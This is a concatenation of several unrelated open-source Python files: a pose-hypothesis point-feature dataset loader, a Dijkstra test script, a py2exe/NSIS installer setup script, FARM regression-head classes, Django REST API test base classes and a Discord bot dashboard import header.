self.norm_cos_weight = args.norm_cos_weight
self.top_n_feat = args.top_n_feat
self.max_hypos = args.max_hypos
self.ppf_only = args.ppf_only
self.n_ppf_hypos = args.n_ppf_hypos
self.n_sift_hypos = args.n_sift_hypos
self.use_mask_test = args.use_mask_test
if args.raw_bop_dataset:
self.loader = BopRawDataset(
args.bop_root, self.dataset_name, args.split, args.split_name, args.ppf_result_file, no_sift=args.ppf_only, no_ppf=args.sift_only
)
else:
self.loader = PrepDataset(
self.dataset_root, self.feature_size
)
self.dim_point = 0
self.dim_render = 0
self.dim_agg = 0
# About timing
self.timing = timing
self.timing_list = []
if args.model_name == "maskconv":
print("Using Point Render dataset")
self.return_rend, self.return_points, self.return_agg = True, True, False
else:
self.return_rend = False
if args.dataset == "feat":
print("Using Agg Dataset")
self.return_points, self.return_agg = False, True
else: # Use PointNet dataset
if "mix" in args.dataset:
print("Using Mix Dataset")
self.return_points, self.return_agg = True, True
else:
print("Using PointNet Dataset")
self.return_points, self.return_agg = True, False
'''For aggregated features Data'''
if self.return_agg:
self.std = None
self.mean = None
self.feature_inliers = True
self.use_hsv = True
self.normalize = True
self.fs_thresh = 0.02
if args.selected_features is not None:
self.selected_features = args.selected_features
print("Using feature indices:", self.selected_features)
elif self.top_n_feat is not None:
self.selected_features = IMPORTANCE_ORDER[:self.top_n_feat]
print("ScoreDataset: Using top features N =", self.top_n_feat)
print("Using feature indices:", self.selected_features)
args.selected_features = self.selected_features
else:
self.selected_features = list(range(39))
print("Using all aggregated features")
args.selected_features = self.selected_features
self.dim_agg = len(self.selected_features)
self.vectorize = partial(vectorize,
use_hsv=self.use_hsv,
feature_inliers=self.feature_inliers,
norm_cos_weight=self.norm_cos_weight,
fs_thresh=self.fs_thresh
)
self.agg_cache = [None for _ in range(len(self.datapoints))]
'''For PointNet Data'''
self.point_x_labels = []
if self.return_points:
self.max_points = args.max_points
args.xyz_channel = [] # indices of point_x channels that define coordinates
args.model_channel = [] # indices of point_x channels that are specific to the object model
'''Mask channel'''
num_features = 0
# valid_proj.unsqueeze(-1).float(),
# valid_depth.unsqueeze(-1).float(),
if not self.args.no_valid_proj:
self.point_x_labels += ['valid_proj']
num_features += 1
if not self.args.no_valid_depth:
self.point_x_labels += ["valid_depth"]
num_features += 1
'''XYZ channel'''
self.uvd, self.uv = False, False
if "uvd" in args.dataset:
self.uvd = True
args.xyz_channel = list(range(num_features, num_features + 3))
num_features +=3
self.point_x_labels += ['u', 'v', 'd']
elif "uv" in args.dataset:
self.uv = True
args.xyz_channel = list(range(num_features, num_features + 2))
num_features += 2
self.point_x_labels += ['u', 'v']
else:
num_features += 0
args.model_channel += args.xyz_channel
num_non_data = num_features
'''Data channel'''
if "cos" in args.dataset:
self.point_x_labels += ['cam_norm_cos']
self.RGB, self.HSV, self.D, self.diff, self.cos, self.edge, self.ppfscore, self.norm_cos = \
False, False, False, False, False, False, False, False
if "RGB" in args.dataset:
self.RGB, self.HSV = True, False
args.model_channel += list(range(num_features, num_features + 3))
num_features += 6
self.point_x_labels += ['R_diff', 'G_diff', 'B_diff'] if "diff" in args.dataset else ["R1", "G1", "B1", "R2", "G2", "B2"]
elif "HSV" in args.dataset:
self.RGB, self.HSV = True, True
args.model_channel += list(range(num_features, num_features + 3))
num_features += 6
self.point_x_labels += ['H_diff', 'S_diff', 'V_diff'] if "diff" in args.dataset else ["H1", "S1", "V1", "H2", "S2", "V2"]
if "D" in args.dataset:
self.D = True
args.model_channel += list(range(num_features, num_features + 1))
num_features += 2
self.point_x_labels += ["D_diff"] if "diff" in args.dataset else ["D1", "D2"]
if "diff" in args.dataset:
self.diff = True
num_features = num_non_data + (num_features-num_non_data) // 2
if "cos" in args.dataset:
self.cos = True
num_features += 1
if "edge" in args.dataset:
self.edge = True
self.edgecos = "edgecos" in args.dataset
self.edgexnor = "edgexnor" in args.dataset
num_features += 1 if (self.edgecos or self.edgexnor) else 2
if self.edgecos:
self.point_x_labels += ['obs_edge_score']
elif self.edgexnor:
self.point_x_labels += ['edge_xnor']
else:
self.point_x_labels += ['obs_edge_score', "rend_edge_score"]
if "ppfscore" in args.dataset:
self.ppfscore = True
num_features += 1
self.point_x_labels += ['ppf_score']
if "norm" in args.dataset:
self.norm_cos = True
num_features += 1
self.point_x_labels += ['norm_cos']
self.seg_mask = False
if "seg" in args.dataset:
self.seg_mask = True
num_features += 1
self.point_x_labels += ['mask', "mask_edge"]
self.dim_point = num_features
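            # At this point self.point_x_labels lists the per-point channels in order (validity
            # masks, optional u/v(/d) coordinates, colour/depth values or differences, edge scores,
            # normal cosines, ...) and self.dim_point holds their total count.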
'''Train/Test specific config'''
if self.mode == 'train':
print("Initializating training dataset", self.point_x_labels)
self.cojitter = args.cojitter
self.drop_ratio = args.drop_ratio
self.uv_rot = args.uv_rot
else:
print("Initializating %s dataset" % mode, self.point_x_labels)
self.cojitter = False
self.drop_ratio = 0
self.uv_rot = False
self.transform = torchvision.transforms.Compose([
torchvision.transforms.ToPILImage(),
torchvision.transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.05),
torchvision.transforms.ToTensor(),
])
if self.cojitter:
self.transform_cojitter = torchvision.transforms.Compose([
torchvision.transforms.ToPILImage(),
torchvision.transforms.ColorJitter(brightness=0.5, contrast=0.5, saturation=0.5, hue=0.5),
torchvision.transforms.ToTensor(),
])
print("ScorePointnetDataset: Using cojitter")
if self.return_rend:
self.dim_render = self.dim_point - 1
def __len__(self):
return len(self.datapoints)
def setNormalization(self, var, mean):
var = torch.from_numpy(np.asarray(var))
mean = torch.from_numpy(np.asarray(mean))
self.std = torch.sqrt(var[self.selected_features]).float()
self.mean = mean[self.selected_features].float()
'''Return [n_hypo, n_features]'''
def getAggData(self, data):
x = self.vectorize(data)
x = x[:, self.selected_features]
if self.normalize:
x = (x-self.mean)/self.std
return x
'''Return [n_hypo, n_points, n_features]'''
def getPointNetData(self, data, return_uv_original=False):
with TorchTimer("Data convert 1", agg_list=self.timing_list, timing = self.timing, verbose=False):
img = data['img'].float() # float [0, 1]
depth = data['depth'].float()
if "pbr" in self.dataset_root and self.mode == "train":
# print("blur depth image")
depth = depth * (torch.ones_like(depth) + 0.003 * torch.randn_like(depth))
transforms = data['transforms'].float()
model_points = data['model_points'].float()
model_colors = data['model_colors'].float() # float [0, 1]
model_normals = data['model_normals'].float()
meta_data = data['meta_data']
with TorchTimer("Transform and project", agg_list=self.timing_list, timing = self.timing, verbose=False):
# Transform and project point cloud
trans_pts = torch.einsum('ijk,mk->imj', transforms[:,:3,:3], model_points) + transforms[:,:3,3].unsqueeze(1)
f_cam = torch.tensor([meta_data['camera_fx'], meta_data['camera_fy']])
c_cam = torch.tensor([meta_data['camera_cx'], meta_data['camera_cy']])
proj_pts = trans_pts[:,:,:2]/trans_pts[:,:,2:]*f_cam + c_cam
uv = proj_pts.long()
invalid_proj = (uv[:,:,1]>=img.shape[0]) + (uv[:,:,1]<0) \
+ (uv[:,:,0]>=img.shape[1]) + (uv[:,:,0]< 0)
uv[invalid_proj] = 0
# Projected depth
proj_depth = trans_pts[:,:,-1]
'''Jitter the color as data augmentation'''
if self.mode == "train":
img = img.permute(2, 0, 1) # (H, W, C) to (C, H, W)
img = self.transform(img)
img = img.permute(1, 2, 0) # (C, H, W) to (H, W, C)
if self.cojitter:
H, W, C = img.shape # (H, W, C)
N, _ = model_colors.shape
data_cojitter = torch.cat([
img.reshape((1, -1, 3)),
model_colors.reshape((1, -1, 3))
], dim=1)
data_cojitter = data_cojitter.permute(2, 0, 1)
cojittered = self.transform_cojitter(data_cojitter)
cojittered = cojittered.permute(1, 2, 0)
img = cojittered[0, :H*W, :].reshape((H, W, C))
model_colors = cojittered[0, H*W:, :].reshape((N, C))
# RGb to HSV
with TorchTimer("RGB to HSV", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.HSV:
with np.errstate(divide='ignore'):
img_rgb = img2uint8(to_np(img))
# img_hsv = rgb2hsv(img_rgb) # this will convert it to range [0, 1]
img_hsv = cv2.cvtColor(img_rgb,cv2.COLOR_RGB2HSV)
img_hsv = img_hsv.astype(float) / 255.0
img = torch.from_numpy(img_hsv).to(img.device).float()
model_colors_rgb = img2uint8(np.expand_dims(to_np(model_colors), 0))
# model_colors_hsv = rgb2hsv(model_colors_rgb)[0]
model_colors_hsv = cv2.cvtColor(model_colors_rgb,cv2.COLOR_RGB2HSV)[0]
model_colors_hsv = model_colors_hsv.astype(float) / 255.0
model_colors = torch.from_numpy(model_colors_hsv).to(model_colors.device).float()
# Sample the observed HSVD
with TorchTimer("Sample obvervation", agg_list=self.timing_list, timing = self.timing, verbose=False):
obs_color = img[uv[:,:,1], uv[:,:,0], :]
obs_depth = depth[uv[:,:,1], uv[:,:,0]]
with TorchTimer("Hypo Pruning", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.args.inconst_ratio_th is not None and self.mode == "test":
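                # Prune pose hypotheses at test time: if more than inconst_ratio_th percent of a
                # hypothesis' projected points land more than 2 cm in front of the observed depth
                # (the rendered model would occlude observed geometry), that hypothesis is dropped.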
d_diff = proj_depth - obs_depth
n_points = model_points.shape[0]
invalid_count = (d_diff < -0.02).sum(-1).float()
invalid_ratio = invalid_count / n_points
th = self.args.inconst_ratio_th
idx = invalid_ratio < (th/100.0)
idx[-1] = True
# At least preserve some non-oracle hypos
if idx.sum() == 1:
idx[0] = True
pruning_mask = idx
transforms = transforms[idx]
trans_pts = trans_pts[idx]
obs_color = obs_color[idx]
obs_depth = obs_depth[idx]
uv = uv[idx]
invalid_proj = invalid_proj[idx]
proj_depth = proj_depth[idx]
self.SelectDataByIdx(data, idx)
uv_original = copy.deepcopy(uv)
data['uv_original'] = uv_original
# Transform normals
with TorchTimer("Transform and project 2", agg_list=self.timing_list, timing = self.timing, verbose=False):
trans_norms = torch.einsum('ijk,mk->imj', transforms[:,:3,:3], model_normals)
cam_norm_cos = (- trans_pts * trans_norms).sum(-1) / (torch_norm_fast(trans_pts, -1) * torch_norm_fast(trans_norms, -1))
valid_norm = cam_norm_cos > 0
valid_proj = valid_norm * torch.bitwise_not(invalid_proj)
data['valid_proj'] = valid_proj
# x = []
x = model_points.new_empty((len(transforms), len(model_points), self.dim_point))
idx_feat = 0
with TorchTimer("Valid proj/depth", agg_list=self.timing_list, timing = self.timing, verbose=False):
valid_depth = obs_depth > 0
'''Mask channel'''
if not self.args.no_valid_proj:
# x += [valid_proj.unsqueeze(-1).float()]
x[:, :, idx_feat] = valid_proj.float()
idx_feat += 1
if not self.args.no_valid_depth:
# x += [valid_depth.unsqueeze(-1).float()]
x[:, :, idx_feat] = valid_depth.float()
idx_feat += 1
'''XYZ channel'''
with TorchTimer("Normalize uv", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.uv or self.uvd:
uv = uv.float()
uv_mean = uv.mean(dim=1, keepdim=True)
uv_std = uv.std(dim=1, keepdim=True)
uv = (uv - uv_mean) / uv_std
if self.uv_rot:
n_hypo, n_point, n_coord = uv.shape
'''random flip'''
flip_mat = torch.rand((n_hypo, 1, n_coord)) > 0.5
flip_mat = (flip_mat.type(uv.dtype) - 0.5) * 2
uv = uv * flip_mat
'''random rotation'''
rot_mat = torch.rand((n_hypo, 1, 1)) * 2 * np.pi
rot_mat = torch.cat([
torch.cos(rot_mat), -torch.sin(rot_mat),
torch.sin(rot_mat), torch.cos(rot_mat)
], 2).reshape((-1, 1, 2, 2))
uv = uv.unsqueeze(-1)
uv = torch.matmul(rot_mat, uv)
uv = uv.squeeze()
# x += [uv]
x[:, :, idx_feat:idx_feat+2] = uv
idx_feat += 2
if self.uvd:
d_diff = proj_depth.unsqueeze(-1) - obs_depth.unsqueeze(-1)
d_diff = (d_diff - d_diff.mean(dim=1, keepdim=True)) / d_diff.std(dim=1, keepdim=True)
# x += [d_diff]
x[:, :, idx_feat:idx_feat+1] = d_diff
idx_feat += 1
'''Point data channel'''
if self.cos:
# x += [cam_norm_cos.unsqueeze(-1).float()]
x[:, :, idx_feat] = cam_norm_cos.float()
idx_feat += 1
with TorchTimer("Compute RGBD/HSVD diff", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.RGB or self.HSV:
if self.diff:
color_diff = model_colors.unsqueeze(0).expand(obs_color.shape) - obs_color
if self.HSV:
color_diff[:,:,0] = color_diff[:,:,0].abs()
color_diff[:,:,0] = np.minimum(color_diff[:,:,0], 1-color_diff[:,:,0])
# x += [color_diff]
x[:, :, idx_feat:idx_feat+3] = color_diff
idx_feat += 3
else:
# x += [model_colors.unsqueeze(0).expand(obs_color.shape), obs_color]
x[:, :, idx_feat:idx_feat+3] = model_colors.unsqueeze(0).expand(obs_color.shape)
idx_feat += 3
x[:, :, idx_feat:idx_feat+3] = obs_color
idx_feat += 3
if self.D:
if self.diff:
# x += [proj_depth.unsqueeze(-1) - obs_depth.unsqueeze(-1)]
x[:, :, idx_feat] = proj_depth - obs_depth
idx_feat += 1
else:
# x += [proj_depth.unsqueeze(-1), obs_depth.unsqueeze(-1)]
x[:, :, idx_feat] = proj_depth
idx_feat += 1
x[:, :, idx_feat] = obs_depth
idx_feat += 1
'''Edge channel'''
with TorchTimer("Edge", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.edge:
'''Observed edges'''
if "depth_for_edge" in data:
depth_for_edge = data['depth_for_edge']
# print("Using depth_for_edge", depth_for_edge.min(), depth_for_edge.max())
else:
depth_for_edge = depth
with TorchTimer("generate_distance_image", agg_list=self.timing_list, timing = self.timing, verbose=False):
edge_obs = generate_distance_image(depth_for_edge, canny_l=20, canny_h=50)[0,0]
with TorchTimer("Edge sampling", agg_list=self.timing_list, timing = self.timing, verbose=False):
uv = copy.deepcopy(uv_original) # Re-fetch the uv as it is changed before
edge_score_obs = edge_obs[uv[:,:,1], uv[:,:,0]]
edge_score_obs = torch.exp(-edge_score_obs / 24)
'''Projected edges'''
with TorchTimer("getRendEdgeScore", agg_list=self.timing_list, timing = self.timing, verbose=False):
if "edge_score_rend" in data:
edge_score_rend = data['edge_score_rend']
else:
with torch.no_grad():
edge_score_rend = getRendEdgeScore(img.to(self.args.edge_gpu), uv_original.to(self.args.edge_gpu)).to(uv_original.device)
'''Normalized edge scores'''
edge_score_rend = edge_score_rend / edge_score_rend.max(1, keepdim=True)[0]
# edge_score_obs = torch.exp(-edge_score_obs / )
if self.edgexnor:
edge_score = edge_score_rend * edge_score_obs + (1 - edge_score_rend) * (1 - edge_score_obs)
# x += [edge_score.unsqueeze(-1)]
x[:, :, idx_feat] = edge_score
idx_feat += 1
elif self.edgecos:
# x += [edge_score_obs.unsqueeze(-1)]
x[:, :, idx_feat] = edge_score_obs
idx_feat += 1
else:
# x += [edge_score_obs.unsqueeze(-1)]
# x += [edge_score_rend.unsqueeze(-1)]
x[:, :, idx_feat] = edge_score_obs
idx_feat += 1
x[:, :, idx_feat] = edge_score_rend
idx_feat += 1
if self.args.camera_scale is not None:
meta_data['camera_scale'] = self.args.camera_scale
'''Use the cos of the angle between observed and rendered normal vectors'''
with TorchTimer("Normal vector", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.norm_cos:
norm_downsample = self.args.norm_downsample
uv = uv_original # Re-fetch the uv as it is changed before
normals = compute_normals(to_np(depth)[::norm_downsample, ::norm_downsample].astype(np.double), meta_data = meta_data)
normals = torch.from_numpy(normals).float()
scene_normals_proj = normals[uv[:,:,1]//norm_downsample, uv[:,:,0]//norm_downsample]
model_normals_proj = trans_norms
norm_cos = (scene_normals_proj * model_normals_proj).sum(dim=-1) / (torch_norm_fast(scene_normals_proj, -1) * torch_norm_fast(model_normals_proj, -1))
norm_cos[norm_cos != norm_cos] = 0
# x += [norm_cos.unsqueeze(-1).float()]
x[:, :, idx_feat] = norm_cos.float()
idx_feat += 1
# with TorchTimer("torch.cat()", agg_list=self.timing_list, timing = self.timing, verbose=False):
# x = torch.cat(x, dim=-1)
# print(x.shape)
if self.args.hard_mask:
x[~valid_proj.bool()]=0
'''Sample the points'''
if self.drop_ratio >= 0 and self.mode == 'train':
n_hypo = x.shape[0]
n_point = x.shape[1]
n_point_kept = int((1.0-self.drop_ratio) * n_point)
if self.max_points is not None and n_point_kept > self.max_points:
n_point_kept = self.max_points
idx = []
for i in range(n_hypo):
idx.append(torch.randperm(n_point)[:n_point_kept].unsqueeze(0))
idx = torch.cat(idx, dim=0)
x = x[torch.arange(n_hypo).unsqueeze(1).expand(n_hypo, n_point_kept), idx]
uv_sampled = uv_original[torch.arange(n_hypo).unsqueeze(1).expand(n_hypo, n_point_kept), idx]
else:
uv_sampled = uv_original
if return_uv_original:
return x, uv_sampled
else:
return x
def getPointRenderData(self, data):
point_x, uv = self.getPointNetData(data, True)
crop_size = 96
pad_size = 2
n_hypo = uv.shape[0]
n_point = uv.shape[1]
span_min = pad_size
span_max = crop_size - pad_size
mask_index = [0]
# data_index = [0, 1] + list(range(4, point_x.shape[2]))
data_index = list(range(point_x.shape[2]))
n_feat = len(data_index)
point_mask = point_x[:, :, mask_index].bool()
point_data = point_x[:, :, data_index]
uv = uv.float()
uv_max = uv.max(dim=1, keepdim=True)[0]
uv_min = uv.min(dim=1, keepdim=True)[0]
uv_center = (uv_max + uv_min) / 2.0
uv_radius = (uv_max - uv_min).max(-1, True)[0] / 2.0
uv_norm = (uv - uv_center) / uv_radius # range in [-1, 1]
uv_resize = (uv_norm + 1) / 2 * (span_max - span_min) + span_min
uv_resize = uv_resize.long()
u = uv_resize[:, :, 0]
v = uv_resize[:, :, 1]
feature_map = torch.zeros(n_hypo, n_feat, crop_size, crop_size)
t = torch.arange(n_hypo).view(-1,1).repeat(1, n_point)
u = u.reshape(-1)[point_mask.view(-1)]
v = v.reshape(-1)[point_mask.view(-1)]
t = t.view(-1)[point_mask.view(-1)]
feature_map[t.view(-1), :, v.view(-1), u.view(-1)] = point_data.view(-1, n_feat)[point_mask.view(-1)]
mask_map = feature_map[:, 0:1, :, :]
data_map = feature_map[:, 1:, :, :]
return mask_map, data_map
def SelectDataByIdx(self, data, idx):
data['transforms'] = data['transforms'][idx]
data['pp_err'] = data['pp_err'][idx]
if "edge_score_rend" in data:
data['edge_score_rend'] = data['edge_score_rend'][idx]
return data
def __getitem__(self, idx):
dp = self.datapoints[idx]
to_return = {"object_id": dp[0], "scene_id": dp[1], "im_id": dp[2]}
obj_id = dp[0]
scene_id = dp[1]
im_id = dp[2]
'''If only used aggregated features, return the cached one'''
if self.return_agg and not self.return_points and self.agg_cache[idx] is not None:
to_return['agg_x'], to_return['pp_err'], to_return['transforms'] = self.agg_cache[idx]
return to_return
# data = loadData(*dp, feature_size = self.feature_size, base_path = self.dataset_root)
# '''Get the model data and send it into the processing function'''
# model_data = self.getModelData(dp[0])
# data.update(model_data)
data = self.loader.loadData(*dp)
assert len(data['pp_err']) == 101 or len(data['pp_err']) == 1101 or len(data['pp_err']) == 301
assert not (self.args.ppf_only and self.args.sift_only)
if self.args.ppf_only:
assert len(data['pp_err']) >= self.args.n_ppf_hypos + 1
idx = list(np.arange(self.args.n_ppf_hypos)) + [-1]
self.SelectDataByIdx(data, idx)
if self.args.sift_only:
assert len(data['pp_err']) >= self.args.n_ppf_hypos + self.args.n_sift_hypos + 1
idx = list(range(self.n_ppf_hypos, self.n_ppf_hypos+self.n_sift_hypos)) + [-1]
data = self.SelectDataByIdx(data, idx)
'''Sample the hypotheses'''
point_x = self.getPointNetData(data)
n_hypo = len(point_x)
to_return['object_id'] = to_return['object_id'].repeat(n_hypo)
to_return['scene_id'] = to_return['scene_id'].repeat(n_hypo)
to_return['im_id'] = to_return['im_id'].repeat(n_hypo)
to_return['pp_err'] = data['pp_err'].reshape(-1)
to_return['transforms'] = data['transforms']
if self.return_agg:
to_return['agg_x'] = self.getAggData(data)
self.agg_cache[idx] = (to_return['agg_x'], to_return['pp_err'], to_return['transforms'])
if self.return_points:
if self.return_rend:
to_return['rend_mask'], to_return['x_rend'] = self.getPointRenderData(data)
to_return['mask_x'] = to_return['rend_mask']
to_return['rend_x'] = to_return['x_rend']
else:
to_return['point_x'] = point_x
# print("to_return['pp_err']", to_return['pp_err'])
# print("to_return['pp_err']", to_return['pp_err'].shape)
# print("to_return['transforms']", to_return['transforms'].shape)
# print("to_return['point_x']", to_return['point_x'].shape)
to_return['dataset_i'] = 0
# For ICP post-processing
to_return['depth'] = data['depth']
to_return['meta_data'] = data['meta_data']
to_return['uv_original'] = data['uv_original']
to_return['model_points'] = data['model_points']
return to_return
| 2.125 | 2 |
em Python/Roteiro7/Roteiro7__testes_dijkstra.py | GuilhermeEsdras/Grafos | 0 | 6947 | from Roteiro7.Roteiro7__funcoes import GrafoComPesos
# .:: Dijkstra Algorithm Test File ::. #
# --------------------------------------------------------------------------- #
grafo_aula = GrafoComPesos(
['E', 'A', 'B', 'C', 'D'],
{
'E-A': 1,
'E-C': 10,
'A-B': 2,
'B-C': 4,
'C-D': 3
}
)
print(grafo_aula)
print('Shortest path by Dijkstra: ', grafo_aula.dijkstra('E', 'D'))
print("-------------------------")
grafo_aula2 = GrafoComPesos(
['A', 'B', 'C', 'D', 'E', 'F', 'G'],
{
'A-B': 1, 'A-F': 3, 'A-G': 2,
'B-F': 1,
'C-B': 2,
'C-D': 5,
'D-E': 2,
'F-D': 4,
'F-G': 2,
'G-E': 7,
}
)
print(grafo_aula2)
print('Shortest path by Dijkstra: ', grafo_aula2.dijkstra('A', 'E'))
| 3.1875 | 3 |
QScreenCast/spyder/api.py | awinia-github/QScreenCast | 0 | 6948 | <filename>QScreenCast/spyder/api.py
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright © <NAME>
# Licensed under the terms of the MIT License
# ----------------------------------------------------------------------------
"""
Python QtScreenCaster Spyder API.
"""
class ScreenResolutions:
Screen1080x1020 = '1080x1020'
| 1.25 | 1 |
setup.py | aaron19950321/ICOM | 5 | 6949 | <filename>setup.py<gh_stars>1-10
import os, os.path
import subprocess
from distutils.core import setup
from py2exe.build_exe import py2exe
PROGRAM_NAME = 'icom_app'
PROGRAM_DESC = 'simple icom app'
NSIS_SCRIPT_TEMPLATE = r"""
!define py2exeOutputDirectory '{output_dir}\'
!define exe '{program_name}.exe'
; Uses solid LZMA compression. Can be slow, use discretion.
SetCompressor /SOLID lzma
; Sets the title bar text (although NSIS seems to append "Installer")
Caption "{program_desc}"
Name '{program_name}'
OutFile ${{exe}}
Icon '{icon_location}'
; Use XPs styles where appropriate
XPStyle on
; You can opt for a silent install, but if your packaged app takes a long time
; to extract, users might get confused. The method used here is to show a dialog
; box with a progress bar as the installer unpacks the data.
;SilentInstall silent
AutoCloseWindow true
ShowInstDetails nevershow
Section
DetailPrint "Extracting application..."
SetDetailsPrint none
InitPluginsDir
SetOutPath '$PLUGINSDIR'
File /r '${{py2exeOutputDirectory}}\*'
GetTempFileName $0
;DetailPrint $0
Delete $0
StrCpy $0 '$0.bat'
FileOpen $1 $0 'w'
FileWrite $1 '@echo off$\r$\n'
StrCpy $2 $TEMP 2
FileWrite $1 '$2$\r$\n'
FileWrite $1 'cd $PLUGINSDIR$\r$\n'
FileWrite $1 '${{exe}}$\r$\n'
FileClose $1
; Hide the window just before the real app launches. Otherwise you have two
; programs with the same icon hanging around, and it's confusing.
HideWindow
nsExec::Exec $0
Delete $0
SectionEnd
"""
class NSISScript(object):
NSIS_COMPILE = "makensis"
def __init__(self, program_name, program_desc, dist_dir, icon_loc):
self.program_name = program_name
self.program_desc = program_desc
self.dist_dir = dist_dir
self.icon_loc = icon_loc
self.pathname = "setup_%s.nsi" % self.program_name
def create(self):
contents = NSIS_SCRIPT_TEMPLATE.format(
program_name = self.program_name,
program_desc = self.program_desc,
output_dir = self.dist_dir,
icon_location = os.path.join(self.dist_dir, self.icon_loc))
with open(self.pathname, "w") as outfile:
outfile.write(contents)
def compile(self):
subproc = subprocess.Popen(
# "/P5" uses realtime priority for the LZMA compression stage.
# This can get annoying though.
[self.NSIS_COMPILE, self.pathname, "/P5"], env=os.environ)
subproc.communicate()
retcode = subproc.returncode
if retcode:
raise RuntimeError("NSIS compilation return code: %d" % retcode)
class build_installer(py2exe):
# This class first builds the exe file(s), then creates an NSIS installer
# that runs your program from a temporary directory.
def run(self):
        # First, let py2exe do its work.
py2exe.run(self)
lib_dir = self.lib_dir
dist_dir = self.dist_dir
# Create the installer, using the files py2exe has created.
script = NSISScript(PROGRAM_NAME,
PROGRAM_DESC,
dist_dir,
os.path.join('.', 'icon.ico'))
print "*** creating the NSIS setup script***"
script.create()
print "*** compiling the NSIS setup script***"
script.compile()
zipfile = r"lib\shardlib"
setup(
name = 'MyApp',
description = 'My Application',
version = '1.0',
    windows = [
{
'script': os.path.join('.','ICOM.py'),
'icon_resources': [(1, os.path.join('.', 'icom.ico'))],
'dest_base': PROGRAM_NAME,
},
],
options = {
'py2exe': {
# Py2exe options...
"optimize": 2
}
},
zipfile = zipfile,
data_files = [],# etc...
cmdclass = {"py2exe": build_installer},
) | 1.960938 | 2 |
src/lingcomp/farm/features.py | CharlottePouw/interpreting-complexity | 2 | 6950 | <gh_stars>1-10
import torch
from farm.data_handler.samples import Sample
from farm.modeling.prediction_head import RegressionHead
class FeaturesEmbeddingSample(Sample):
def __init__(self, id, clear_text, tokenized=None, features=None, feat_embeds=None):
super().__init__(id, clear_text, tokenized, features)
self.feats_embed = feat_embeds
class FeaturesRegressionHead(RegressionHead):
"""A regression head mixing [CLS] representation
and explicit features for prediction"""
def forward(self, x, feats, **kwargs):
x = torch.cat((x, feats), 1)
logits = self.feed_forward(x)
return logits
| 2.4375 | 2 |
manager/tests/api_view_test_classes.py | UN-ICC/icc-digital-id-manager | 3 | 6951 | import pytest
from rest_framework import status
from rest_framework.test import APIClient
class TestBase:
__test__ = False
path = None
get_data = {}
put_data = {}
post_data = {}
delete_data = {}
requires_auth = True
implements_retrieve = False
implements_create = False
implements_update = False
implements_destroy = False
client = APIClient()
@pytest.fixture
def setup(self, setup_method=None):
return setup_method
@pytest.fixture
def authenticate(self, api_client_admin):
self.client = api_client_admin
class TestGet(TestBase):
@pytest.fixture
def get_response(self):
return self.client.get(f"/{self.path}", self.get_data, format="json",)
def test_get_without_authentication(self, setup, get_response):
if not self.requires_auth:
if not self.implements_retrieve:
returns_status_code_http_405_not_allowed(get_response)
else:
returns_status_code_http_200_ok(get_response)
response_has_etag(get_response)
else:
returns_status_code_http_401_unauthorized(get_response)
def test_get_with_authentication(self, setup, authenticate, get_response):
if not self.implements_retrieve:
returns_status_code_http_405_not_allowed(get_response)
else:
returns_status_code_http_200_ok(get_response)
response_has_etag(get_response)
class TestPost(TestBase):
@pytest.fixture
def post_response(self):
return self.client.post(
path=f"/{self.path}", data=self.post_data, format="json",
)
def test_post_without_authentication(self, setup, post_response):
returns_status_code_http_401_unauthorized(post_response)
def test_post_with_authentication(self, setup, authenticate, post_response):
if self.implements_create:
returns_status_code_http_201_created(post_response)
else:
returns_status_code_http_405_not_allowed(post_response)
class TestPut(TestBase):
@pytest.fixture
def put_response(self):
return self.client.put(f"/{self.path}", self.put_data, format="json",)
def test_put_without_authentication(self, setup, put_response):
if not self.requires_auth:
if self.implements_update:
returns_status_code_http_200_ok(put_response)
else:
returns_status_code_http_405_not_allowed(put_response)
else:
returns_status_code_http_401_unauthorized(put_response)
def test_put_with_authentication(self, setup, authenticate, put_response):
if not self.implements_update:
returns_status_code_http_405_not_allowed(put_response)
elif self.requires_auth:
returns_status_code_http_200_ok(put_response)
else:
returns_status_code_http_401_unauthorized(put_response)
class TestDelete(TestBase):
@pytest.fixture
def delete_response(self):
return self.client.delete(f"/{self.path}", self.delete_data, format="json")
def test_delete_without_authentication(self, setup, delete_response):
if not self.requires_auth:
if self.implements_destroy:
returns_status_code_http_204_no_content(delete_response)
else:
returns_status_code_http_405_not_allowed(delete_response)
else:
returns_status_code_http_401_unauthorized(delete_response)
def test_delete_with_authentication(self, setup, authenticate, delete_response):
if not self.implements_destroy:
returns_status_code_http_405_not_allowed(delete_response)
elif self.requires_auth:
returns_status_code_http_204_no_content(delete_response)
else:
returns_status_code_http_401_unauthorized(delete_response)
class TestView(TestGet, TestPost, TestPut, TestDelete):
__test__ = False
requires_auth = True
class TestListCreateAPIView(TestView):
__test__ = False
implements_retrieve = True
implements_create = True
requires_auth = True
class TestRetrieveAPIView(TestView):
__test__ = False
implements_retrieve = True
requires_auth = True
class TestUnauthenticatedRetrieveAPIView(TestView):
__test__ = False
implements_retrieve = True
requires_auth = False
def returns_status_code_http_200_ok(response):
assert response.status_code == status.HTTP_200_OK
def returns_status_code_http_401_unauthorized(response):
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def returns_status_code_http_201_created(response):
assert response.status_code == status.HTTP_201_CREATED
def returns_status_code_http_204_no_content(response):
assert response.status_code == status.HTTP_204_NO_CONTENT
def returns_status_code_http_405_not_allowed(response):
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
def response_has_etag(response):
assert response.get("ETag")
| 2.25 | 2 |
dashboard/dashboard.py | TrustyJAID/Toxic-Cogs | 0 | 6952 | <reponame>TrustyJAID/Toxic-Cogs
from collections import defaultdict
import discord
from redbot.core import Config, checks, commands
from redbot.core.bot import Red
from redbot.core.utils.chat_formatting import box, humanize_list, inline
from abc import ABC
# ABC Mixins
from dashboard.abc.abc import MixinMeta
from dashboard.abc.mixin import DBMixin, dashboard
# Command Mixins
from dashboard.abc.roles import DashboardRolesMixin
from dashboard.abc.webserver import DashboardWebserverMixin
from dashboard.abc.settings import DashboardSettingsMixin
# RPC Mixins
from dashboard.baserpc import HUMANIZED_PERMISSIONS, DashboardRPC
from dashboard.menus import ClientList, ClientMenu
THEME_COLORS = ["red", "primary", "blue", "green", "greener", "yellow"]
